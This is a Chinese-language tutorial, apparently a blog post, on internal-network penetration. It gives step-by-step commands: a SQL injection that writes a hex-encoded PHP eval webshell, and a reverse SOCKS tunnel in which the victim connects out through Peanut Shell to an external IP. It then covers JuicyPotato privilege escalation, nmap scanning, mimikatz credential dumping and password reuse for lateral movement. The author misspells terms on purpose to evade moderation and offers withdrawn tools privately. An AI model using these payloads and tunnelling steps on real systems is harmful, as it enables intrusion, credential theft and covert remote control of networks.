网络安全进阶篇(十一章-3)内网渗透(上)
每日一句:
做安全,有一定实力的话。找工作,待遇不好就不要去,不要委屈求全。
世界上好地方那么多,不出去看看的话,你就以为这就是世界
另外,二进制其实也不是多值钱的玩意,没必要觉得多深奥
声明:
内网渗透是非常危险的,没有明确的授权不要做。切记切记
本篇文章用到的软件100%报毒,最好在虚拟机用,不怕后门的可以在本机运行
一、win提升权限
(一),sql注入可以干什么?
~获取数据、读取文件、影响数据库
~通过写一句马从而getshell
(二),sql语句:导出文件
~into outfile
~into dumpfile
举例:
语句:
select 1,2,3 into dumpfile 'C:\\www\\123.txt'
作用:
在“c:\www\”目录下新建123.txt。
其内容为“123”
进阶:通过此方式写一句马
语句:
select 1,2'' into dumpfile 'C:\\www\\123.php'
作用:
在“c:\www”目录下新建123.php文件,内容为一句马
注意:
1,这个函数(into dumpfile)在mysql高版本是默认不开启的
类似的还有load_file(),一般这两个函数要开启都会开启
2,如何存在堆叠注入(即可以同时执行多条语句),
可以通过日志的方法写webshell。
3,在phpstudy修改默认状态后,需要重启生效
4,在老一点的版本中是可以直接使用的,新版本会报一个1290权限的错误
实战中的语句:
url ?id=1 union select 1,'一句马内容' into dumpfile "C:\\www\\123.php"
补充:
(1),这个路径怎么获得?
通过sql报错注入,使服务器爆出路径
若爆不出,只能靠猜了。
当然也可以配合别的攻击手段使爆出绝对路径
(2),第一次写文件,建议先写一个txt文档,成功后在写php文件
可以看看自己写到txt的代码有没有问题,避免一些悬学问题
(3),一句马内容
若直接写“”肯定报错
因为url栏中“?”一般代表传参 会冲突。
(4)那一句马怎么写?
将一句马内容16进制编码。即得到:
“3c3f7068706576616c28245f524551554553545b385d293f3e”
注意:16进制编码会将空格默认去掉,即上边的编码,
解码后是这样的:
而php中,那个空格是格式,这样的代码是会报错的。
怎么办?----->加空格! (空格的16进制编码是20),
即在“3c3f706870”后加“20”。
事实上,3c3f706870就是是‘二、花生.壳巧获得公网IP
问题:假如没有公网ip,是不是就无计可施了?
答曰:非也、非也,我们可以利用一些内网穿。透工具(如花生.壳,官网:https://qydev.com/index.html)。
但是要明白一件事,省了钱,就一定会多麻烦一些。所谓鱼和熊掌不可兼得
多说一句,不知道提到远cheng控制 同学们有没有想到向日葵等一些商用远a控,从原理上来说
是可以行的通的,当然这就多提一句,同学们有时间可以自己去摸索一下。
问题:花sheng壳等内网穿。透工具的原理是什么样的?
答曰:我们的电脑与花生.壳建立一个连接,此时生成一个域名,
让目标靶机去访问(连接)花生.壳生成的域名,此时通过花2生壳的桥接作用就连接到了本机
最终,我么让服务器通过花生.壳这个中间桥梁反向连接到了本机电脑
本机 <---> 花生.壳 <---> 目标靶机
问题:如何具体操作上述
答曰:~注册花生.壳,官网上述有
~点击隧道管理-开通隧道,(因为是学习,没有多大的要求)
~选择免费的就行,填写信息:
隧道协议勾选tcp,名称随便写,本机端口写127.0.0.1:666(端口可以随便写一个系统没用的就行)
此时,你的隧道管理处会多一个隧道(自动生成keycode,公网域名)
~根据需要下载一个客户端版本,打开,将隧道管理处的keycode粘贴到客户端
~别的电脑访问生成的公网域名就等于访问你电脑的127.0.0.1:666端口,
即完成架桥梁,突破公网内网的限制,但是仅仅可以放出本机一个端口。有条件的话,还是推荐阿里云
假如有服务器,别人就可以直接访问到了,也不要上述步骤。而且可以访问到全端口
问题:花生.壳在涉及到隧道时,需要手机接验证码,有没有纯匿名的?
答曰:有,国外的ngrok,完全匿名。但是速度较慢
其实到此时,若是没什么特别的问题。我们直接通过菜刀等工具将下载的花生.壳软件放到靶机,
将靶机的3389端口直接放出来,即完成了最初的目标,控制了目标服务器。
问题:若是内网有3台服务器,a机器能访问公网被我们通过花生.壳拿下,但是b,c机器不能访问公网该如何拿下?
答曰:可以通过一些非正统的方法,如通过a机器继续套娃远cheng控制b与c等等
当然本文章既然是讲到了内网,那么就得和大家普及一下正统的内网的纵横方法,
不要急,继续往下看
三、ew内网穿。透端口转发
介绍官网:http://rootkiter.com/EarthWorm/
ps:
但是,让人吐血的是 官网竟然不给下载了。
据开发者本人说“考虑到该工具影响很坏,该工具永久停止更新,如要反馈查杀规则请移”
简单说,工具很强,危害很大,我不更新了,也不给你们下载了(有需要的朋友可以私信我,包括win、linux、mac)
0. Ew常用的命令
(1)
接受代理: ew(软件名) -s rcsocks -l 8888 -e 9999
命令解释: 监听9999端口,将获取到的数据转发给8888端口,若接受到数据会在cmd中返回一个ok
不是太懂?
~9999是我的工资卡,8888是我对象的工资卡
~当我卡里打入工资的时候,我都主动的将钱转给我对象
~并给对象一下:“老婆,嘿嘿,我将钱打到你卡里了”
(2)
建立反向代理:ew(软件名) -s rssocks -d 1.1.1.1 -e 8888
命令解释: 将本机反向连接到1.1.1.1的8888端口。这句命令是在目标靶机执行的
不是太懂?
~我恋爱了,正常都是我主动去找女朋友玩, //即正向连接
~但是她妈妈最近管的严,我不能再去她家找她玩了。
~所以我给女友一个手机(ew),
~约会的前告诉女友,我在“1.1.1.1的8888”这个地方等你
~女友从家里出来,来找我 //即反向连接
即我们药酱这个ew要上传到目标靶机上,且在靶机执行上述命令
问题:注意的是,这个-d后的参数是IP,而非域名。怎么通过域名得到IP呢?
答曰:直接cmd中,ping这个域名,就可以看到IP了
1.首先申请花sheng壳,建立一个tcp的连接协议,
假设花生.壳生成的域名及其远程端口为:free.aaa.com:4472
映射(连接)到的本机的端口为:127.0.0.1:6666。 //详细过程上边有,描述很复杂 操作很简单
注意:这个本机映射的端口不能与本电脑已经运行的端口相冲突,很好理解,
比如一个端口你的qq已经占用了,你还让花生.壳走这个端口,这肯定会造成冲突。
正常的操作是让qq走一个端口,花生.壳走另一个
2.在本机开启监听
ew_for_win_32.exe(ew的名字) -s rcsocks -l 4545 -e 6666
//即6666端口收到数据,将数据转给4545端口。同时在终端返回 "ok"
3.通过菜刀将ew上传到目标靶机,最好同时将烂土豆也上传过去。防止执行一些命令权限不够
~将烂土豆改名为1.exe ew改名为2.exe
~改名字仅仅是因为在菜刀的虚拟终端执行命令时,简化指令
4.在菜刀的虚拟终端执行命令,连接花6生壳
~通过 1 中我们知道,花生.壳的域名为free.aaa.com通过ping我们得知其对应的IP为47.92.102.131
~靶机通过ew进行反向连接:
1.exe -p "2.exe -s rssocks -d 47.92.102.131 -e 4472"
5.本机终端会返回“ok”,代表本机与目标靶机通过花a生壳可以直接进行 端口间数据通讯
此时,就差最后一步,我们就可以对目标靶机进行控制了
我们只要挂上SOCKS5的代理就可以了,这个东西的原理较为复杂,咱们是搞安全的不用把这个原理搞明白,直接用就ok
6.安装Proxifier,设置SOCKS5代理
~安装Proxifier(安装包可以私聊我要,或者自己谷歌下载)
~打开Proxifier,点击配置文件,点击代理服务器,点击编辑
~地址设置为127.0.0.1,端口设置为4545
7.收获
此时我们才算是成功控制了目标靶机,我们在本机浏览器做的任何操作都相当于是在目标靶机上做的操作
比如,此时我们在浏览器百度“IP” ;会发现IP地址是目标靶机的IP,而非本机的IP。
这时,我们就可以在自己浏览器直接访问目标靶机的内网了。
当然,可以访问内网也可以通过3389进行远程连接这个目标靶机了
补充:只不过可能会有一些卡顿,毕竟代理了好几层
总结过程:
本机4545端口 //设置SOCKS5代理,可访问目标靶机,可通过3389进行远程连接靶机
<-- //将6666端口的数据转给4545
本机6666端口 //通过ew进行端口数据监听与转发
<--> //本机反向连接花生.壳
花生.壳(域名:free.aaa.com,IP:47.92.102.131,端口为4472) //提供公网IP,充当桥梁、中间人角色
<--> //受害靶机反向连接花b生壳
目标靶机(直接执行命令反向连接) //通过烂土豆、ew进行反向连接
四、探测内网机器
0.思路
正常是先探测下内网主机,在探测下主机端口
在找一找本机里的文件,看看有没有什么发现
在根据端口去寻找问题,
例如:
某内网机器开启了445端口(445端口有个内网大杀器--永恒之蓝)
开了3389(3389可以尝试爆破登录,或者试试cve-2019-0708能不能直接拿下)
一般而言,网站都是外紧内送。一旦突进了内网,里面的东西是很脆弱的。
比如弱密码,一些开发了一半的网站等等
而且很多内网的机器都没有打永恒之蓝的补丁
1.条件
通过3389远程连接成功后,此时就相当于我们多了一个电脑,我们可以进行横扫内网
2.在靶机安装nmap
~将nmap先压缩一下
~通过菜刀上传到目标靶机
//多说一句,有的大文件菜刀可能会上传失败
//问:如何知道我们有没有成功上传文件呢?
答:直接在菜刀里更新一下文件目录不就好了
~发现菜刀连接失败的话,直接将压缩包 通过 远程桌面连接复制过去
另外,也有一些野的思路,比如在目标靶机装一个qq,通过qq传过去等等
当然,在这我仅仅是提一下。攻陷一个目标有很多种方法,大家不要思维固化。
3.通过nmap探测C段
~将上传成功的nmap在目标靶机安装
~通过ipconfig查看靶机的IP; //假设是10.0.1.4
~探测内网机器:nmap 10.0.1.1/24 //就是将10.0.1.1-10.0.1.255探测一遍
当然这是不太重要的话,简单探测探测。
比较重要的话,直接将所有的内网IP段全探测了
五、提取本机管理员账号密码
0.前言
内网很多情况是这样的,内网很多机器,但是管理员可能就是那么几个人,
所以各个机器的用户账号密码相同的可能性极高,那么我们如果能获取本机所有用户的密码,
就可以看到管理员原本设置的密码。
1.介绍一款神器--mimikatz(别名猕猴桃)
是一款内网渗透中常用的工具,也有人喜欢叫法国神器,因为是法国的本杰明·德尔皮编写创建
下载地址:https://github.com/gentilkiwi/mimikatz
因为Windows会把用户的明文密码放在内存里面,
所以它可以从内存中提取纯文本密码,哈希和kerberos票证。
//这个kerberos票据是关于域控的知识,下次在说相关内网
另外windows server 2012及其上就不储存明文,这个时候可以通过修改注册列表的形式开启明文密码显示
然后,静静等待管理员的访问。管理员什么时候访问,什么时候得到明文密码
之前说本文中用到的工具报毒,也主要是因为这个东西。
2.mimikatz的三条命令(按顺序执行即可)
privilege::debug 提升权限
log 新建日志记录
sekurlsa::logonpasswords 抓取密码
使用方法:
(1):
手动输入
(2):
打开mimikatz,在菜单栏右击,
选择编辑,粘贴
报错处理:
以管理员身份运行该软件
尝试重新打开在运行试试
可能是版本错了,32位系统就用32的,64就用64的
说明:
这个mimikatz是去电脑内存搞事情,所以要很高的权限。
对于权限,system并不是最高的。在此之上还有很多乱七八糟的权限
只是对初学者用的比较少,我们先不要细究
综上mimikatz是去内存搞事情,所以要提升权限,
即先执行权限提升的命令
然后在执行抓取密码的命令
使用log命令,可以在猕猴桃的同目录下生成日志记录文件。
这样抓到的密码就可以直接在日志文件中复制了。
3.搞一搞内网中别的机器
如我们通过nmap探测到内网中一个10.0.1.5这个机器
~我们就可以通过已经连接的靶机A去 连接这个新的机器B
~或者我们已经通过SOCKS5在本机 在开一个远程桌面连接就可以用在A机器获取的密码去连接B机器
总结:
~已经远程连接到靶机A机器
~用mimikatz抓取A机器上的所有账号与密码
~因为内网中的机器绝大多数的账号密码都相同
~我们就可以用A机器上得到的账号密码去远程连接内网中的B机器、C机器等等
~而B机器、C机器的内网IP,我们也可以通过A机器上的nmap得到
在下一篇文章中,在主要介绍一下域控及其票据相关知识
有些内容有错别字,因为平台的审核太严格。不过大家应该可以看懂,毕竟内网渗透太敏感了,在次感谢审核人员通过
如:花生.壳 ---> 其实是huashengke;